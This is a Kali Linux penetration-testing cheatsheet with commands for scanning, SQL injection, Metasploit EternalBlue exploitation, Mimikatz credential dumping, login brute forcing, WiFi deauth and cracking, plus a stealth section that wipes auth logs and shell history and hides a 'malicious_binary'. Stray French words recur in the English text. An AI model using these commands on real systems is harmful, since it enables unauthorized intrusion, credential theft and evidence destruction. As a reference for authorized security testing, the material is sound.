
Kali Linux Cheatsheet

Kali Linux is a Debian-based Linux distribution specifically designed for digital forensics and penetration testing. Developed and maintained by Offensive Security, Kali Linux comes pre-installed with over 600 penetration testing tools, making it the go-to platform for cybersecurity professionals, ethical hackers, and security researchers worldwide.

Installation and Setup

Download and Installation

# Download Kali Linux ISO
wget https://cdimage.kali.org/kali-2024.1/kali-linux-2024.1-installer-amd64.iso

# Verify checksum (compare the output with the checksum list published alongside the ISO, after checking that list's signature; the hash alone proves nothing)
sha256sum kali-linux-2024.1-installer-amd64.iso

# Create bootable USB (Linux)
sudo dd if=kali-linux-2024.1-installer-amd64.iso of=/dev/sdX bs=4M status=progress

# Create bootable USB (Windows - use Rufus or similar tool)
# Use Rufus, Etcher, or Win32DiskImager

Virtual Machine Setup

# VMware recommended settings
# RAM: 4GB minimum, 8GB recommended
# Storage: 80GB minimum
# Network: NAT or Bridged

# VirtualBox recommended settings
# RAM: 4GB minimum, 8GB recommended
# Storage: 80GB minimum, VDI format
# Network: NAT or Bridged
# Enable VT-x/AMD-V virtualization

Initial configuration

# Update system
sudo apt update && sudo apt upgrade -y

# Install additional tools
sudo apt install -y kali-linux-large

# Configure non-root user (recommended)
sudo useradd -m -s /bin/bash username
sudo usermod -aG sudo username
sudo passwd username

# Enable SSH (if needed)
sudo systemctl enable ssh
sudo systemctl start ssh

# Configure firewall (if this machine is managed over SSH, run `sudo ufw allow ssh` before `ufw enable`, or the session will be dropped)
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing

Essential Tools and Commands

Information Gathering

# Nmap - network scan
nmap -sS -sV -O cible_ip
nmap -sC -sV -oA scan_results cible_ip
nmap --script vuln cible_ip

# Masscan - Fast port scanner
masscan -p1-65535 cible_ip --rate=1000

# Dmitry - Information gathering
dmitry -winsepo output.txt cible.com

# theHarvester - Email and subdomain gathering
theHarvester -d cible.com -l 500 -b google

# Recon-ng - Web reconnaissance framework
recon-ng
[recon-ng][default] > workspaces create cible_workspace
[recon-ng][cible_workspace] > modules load recon/domains-hosts/google_site_web

Vulnerability Assessment

# OpenVAS - vulnerability scanner
sudo gvm-setup
sudo gvm-start
sudo gvm-feed-update

# Nikto - Web vulnerability scanner
nikto -h http://cible.com
nikto -h http://cible.com -o nikto_results.txt

# Dirb - Directory brute forcer
dirb http://cible.com
dirb http://cible.com /usr/share/dirb/wordlists/big.txt

# Gobuster - Directory/file brute forcer
gobuster dir -u http://cible.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dns -d cible.com -w /usr/share/wordlists/dnsmap.txt

# WPScan - WordPress vulnerability scanner
wpscan --url http://cible.com --enumerate u,p,t
wpscan --url http://cible.com --passwords /usr/share/wordlists/rockyou.txt

Web Application Testing

# Burp Suite - web application security testing
burpsuite &

# OWASP ZAP - web application scanner
zaproxy &

# SQLmap - SQL injection testing
sqlmap -u "http://cible.com/page.php?id=1" --dbs
sqlmap -u "http://cible.com/page.php?id=1" -D database_name --tables
sqlmap -u "http://cible.com/page.php?id=1" -D database_name -T table_name --dump

# Commix - command injection testing
commix --url="http://cible.com/page.php?id=1"

# XSSer - cross-site scripting (XSS) testing
xsser --url "http://cible.com/search.php?q=XSS" --auto

Exploitation

# Metasploit Framework
msfconsole
msf6 > search type:exploit platform:windows
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS cible_ip
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

# Searchsploit - exploit database search
searchsploit apache 2.4
searchsploit -m 12345.py

# Social Engineering Toolkit
setoolkit
# Select from menu options for hameçonnage, credential harvesting, etc.

# BeEF - Browser exploitation framework
beef-xss
# Access web interface at http://127.0.0.1:3000/ui/panel

Post-exploitation

# Meterpreter commands (within Metasploit session)
meterpreter > sysinfo
meterpreter > getuid
meterpreter > ps
meterpreter > migrate PID
meterpreter > hashdump
meterpreter > screenshot
meterpreter > download C:\\file.txt /tmp/
meterpreter > upload /tmp/file.txt C:\\

# Empire - PowerShell post-exploitation
powershell-empire server
powershell-empire client

# Mimikatz - Credential extraction
mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam

Password Attacks

# John the Ripper - password cracking
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt

# hashcat - Advanced password recovery
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a?a?a

# Hydra - Network login cracker
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://cible_ip
hydra -L users.txt -P passwords.txt ftp://cible_ip
hydra -l admin -P /usr/share/wordlists/rockyou.txt cible_ip http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid"

# Medusa - Parallel login brute forcer
medusa -h cible_ip -u admin -P /usr/share/wordlists/rockyou.txt -M ssh
medusa -H hosts.txt -U users.txt -P passwords.txt -M ftp

# Crunch - Wordlist generator
crunch 8 8 -t ,@@@@@@@ -o wordlist.txt
crunch 6 10 abcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt

Wireless Security

# Aircrack-ng suite - WiFi security testing
# Monitor mode
airmon-ng start wlan0

# Capture packets
airodump-ng wlan0mon

# Capture specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Deauth attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack WPA/WPA2
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Reaver - WPS attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

# Wifite - Automated wireless attack
wifite --wpa --dict /usr/share/wordlists/rockyou.txt

Digital Forensics

# Autopsy - digital forensics platform
autopsy &

# Volatility - Memory analysis
volatility -f memory.dump imageinfo
volatility -f memory.dump --profile=Win7SP1x64 pslist
volatility -f memory.dump --profile=Win7SP1x64 netscan
volatility -f memory.dump --profile=Win7SP1x64 malfind

# Binwalk - Firmware analysis
binwalk firmware.bin
binwalk -e firmware.bin

# Foremost - File carving
foremost -i disk_image.dd -o recovered_files/

# Sleuth Kit - File system analysis
fls -r disk_image.dd
icat disk_image.dd inode_number > recovered_file

Reverse Engineering

# Ghidra - NSA reverse engineering tool
ghidra &

# Radare2 - reverse engineering framework
r2 binary_file
[0x00000000]> aaa
[0x00000000]> pdf @main

# GDB - GNU Debugger
gdb binary_file
(gdb) run
(gdb) break main
(gdb) continue
(gdb) info registers

# Strings - Extract strings from binaries
strings binary_file
strings -n 10 binary_file | grep -i password

# Hexdump - Hex viewer
hexdump -C binary_file|head -20
xxd binary_file|head -20

System Administration

Package Management

# Update package lists
sudo apt update

# Upgrade all packages
sudo apt upgrade -y

# Install specific tools
sudo apt install -y tool_name

# Install Kali metapackages
sudo apt install -y kali-linux-large
sudo apt install -y kali-linux-everything
sudo apt install -y kali-tools-top10

# Search for packages
apt search keyword
apt show package_name

# Remove packages
sudo apt remove package_name
sudo apt purge package_name
sudo apt autoremove

Service Management

# Systemctl commandes
sudo systemctl start service_name
sudo systemctl stop service_name
sudo systemctl restart service_name
sudo systemctl enable service_name
sudo systemctl disable service_name
sudo systemctl status service_name

# Common services
sudo systemctl start ssh
sudo systemctl start apache2
sudo systemctl start postgresql
sudo systemctl start mysql

# Check listening ports
netstat -tlnp
ss -tlnp

Network configuration

# Interface configuration
ip addr show
ip link set eth0 up
ip link set eth0 down

# Static IP configuration
sudo nano /etc/network/interfaces
# Add:
# auto eth0
# iface eth0 inet static
# address 192.168.1.100
# netmask 255.255.255.0
# gateway 192.168.1.1

# DNS configuration (NetworkManager or resolvconf may overwrite this file on the next reconnect; if so, set DNS in the connection profile instead)
sudo nano /etc/resolv.conf
# Add:
# nameserver 8.8.8.8
# nameserver 8.8.4.4

# Restart networking
sudo systemctl restart networking

User Management

# Add user
sudo useradd -m -s /bin/bash username
sudo passwd username

# Add user to groups
sudo usermod -aG sudo username
sudo usermod -aG adm username

# Switch user
su - username
sudo -u username command

# View user information
id username
groups username
finger username

# Lock/unlock user
sudo usermod -L username
sudo usermod -U username

Advanced Techniques

Custom Tool Installation

# Install from source
git clone https://github.com/tool/repository.git
cd repository
make && sudo make install

# Python tools
pip3 install tool_name
pip3 install -r requirements.txt

# Go tools
go install github.com/tool/repository@latest

# Ruby gems
gem install tool_name

# Manual Installation
wget https://exemple.com/tool.tar.gz
tar -xzf tool.tar.gz
cd tool
./configure && make && sudo make install

Environment Customization

# Bash aliases
nano ~/.bashrc
# Add useful aliases:
alias ll='ls -la'
alias la='ls -A'
alias l='ls -CF'
alias ..='cd ..'
alias ...='cd ../..'
alias grep='grep --color=auto'
alias nmap='nmap --reason --open --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit'

# Custom functions
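#######################################
# Extract an archive, choosing the tool from its file extension.
# Arguments: $1 - path to the archive
# Outputs:   the archive contents, written to the current directory
#            (each tool's default); diagnostics go to stderr
# Returns:   0 on success, 1 when the file is missing or the
#            extension is not recognized
#######################################
extract() {
    local archive=$1
    # An unquoted, empty $1 would make "[ -f ]" succeed; quote and fail early.
    if [[ ! -f "$archive" ]]; then
        echo "'$archive' is not a valid file" >&2
        return 1
    fi
    # Order matters: compound suffixes (.tar.bz2, .tar.gz) must be matched
    # before the plain .bz2 / .gz patterns that would otherwise catch them.
    case "$archive" in
        *.tar.bz2)   tar xjf "$archive"    ;;
        *.tar.gz)    tar xzf "$archive"    ;;
        *.bz2)       bunzip2 "$archive"    ;;
        *.rar)       unrar e "$archive"    ;;
        *.gz)        gunzip "$archive"     ;;
        *.tar)       tar xf "$archive"     ;;
        *.tbz2)      tar xjf "$archive"    ;;
        *.tgz)       tar xzf "$archive"    ;;
        *.zip)       unzip "$archive"      ;;
        *.Z)         uncompress "$archive" ;;
        *.7z)        7z x "$archive"       ;;
        *)
            echo "'$archive' cannot be extracted via extract()" >&2
            return 1
            ;;
    esac
}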

# Source the changes
source ~/.bashrc

Automation Scripts

# Basic reconnaissance script
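#!/bin/bash
# Basic reconnaissance script: runs nmap, gobuster and nikto against one
# host and stores every report under results/<target>/.
#
# Usage: recon.sh <target>   (target is a hostname or IP address)
#
# Each scanner is run best-effort: a failing tool is reported on stderr and
# the script moves on to the next one, as the original did.
set -uo pipefail

cible=${1:-}
if [ -z "$cible" ]; then
    echo "utilisation: $0 <cible>"
    exit 1
fi

# The target becomes a path component below; refuse anything that is not a
# plain hostname/IP so a value such as "../x" cannot escape results/.
if [[ ! "$cible" =~ ^[A-Za-z0-9._-]+$ ]]; then
    echo "invalid target: $cible" >&2
    exit 1
fi

out_dir="results/$cible"
echo "Starting reconnaissance on $cible"
mkdir -p -- "$out_dir" || exit 1

# Nmap scan (-sS and -O generally need root; -oA writes .nmap/.gnmap/.xml)
echo "Running Nmap scan..."
nmap -sS -sV -sC -O -oA "$out_dir/nmap_scan" "$cible" \
    || echo "nmap failed on $cible" >&2

# Directory enumeration
echo "Running directory énumération..."
gobuster dir -u "http://$cible" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o "$out_dir/gobuster.txt" \
    || echo "gobuster failed on $cible" >&2

# Nikto scan
echo "Running Nikto scan..."
nikto -h "http://$cible" -o "$out_dir/nikto.txt" \
    || echo "nikto failed on $cible" >&2

echo "reconnaissance complete. Results saved in results/$cible/"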

Persistence and Stealth

# SSH key persistence
ssh-keygen -t rsa -b 4096
ssh-copy-id user@cible_ip

# Cron job persistance
crontab -e
# Add: @reboot /path/to/script.sh

# service persistance
sudo nano /etc/systemd/system/custom.service
# Create service file for persistance

# Log cleaning
sudo truncate -s 0 /var/log/auth.log
sudo truncate -s 0 /var/log/syslog
history -c && history -w

# processus hiding
nohup ./malicious_binary > /dev/null 2>&1 &
disown

Troubleshooting

Common Issues

# WiFi adapter not working
sudo airmon-ng check kill
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

# VirtualBox guest additions
sudo apt install -y virtualbox-guest-x11
sudo VBoxClient --clipboard
sudo VBoxClient --draganddrop

# Graphics issues
sudo apt install -y kali-desktop-xfce
sudo dpkg-reconfigure lightdm

# Sound issues
sudo apt install -y pulseaudio
pulseaudio --start

# Network issues
sudo dhclient eth0
sudo systemctl restart networking
sudo systemctl restart NetworkManager

Performance Optimization

# Disable unnecessary services
sudo systemctl disable bluetooth
sudo systemctl disable cups
sudo systemctl disable avahi-daemon

# Clean system
sudo apt autoremove
sudo apt autoclean
sudo apt clean

# Monitor resources
htop
iotop
nethogs
iftop

# Optimize for VMs
sudo apt install -y open-vm-tools
sudo apt install -y virtualbox-guest-utils

Security Best Practices

Operational Security

# Use VPN for testing
sudo openvpn config.ovpn

# Proxy chains configuration
sudo nano /etc/proxychains.conf
proxychains nmap cible_ip

# Tor usage
sudo systemctl start tor
proxychains firefox

# MAC address randomization
sudo macchanger -r wlan0
sudo macchanger -m 00:11:22:33:44:55 wlan0

# Secure deletion
shred -vfz -n 3 sensitive_file
wipe -rf directory/
# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality
# Respect privacy and data protection laws

# Create engagement documentation
echo "Penetration Test autorisation" > autorisation.txt
echo "Client: Company Name" >> autorisation.txt
echo "Scope: IP ranges, domains" >> autorisation.txt
echo "Date: $(date)" >> autorisation.txt
echo "Tester: Your Name" >> autorisation.txt

Resources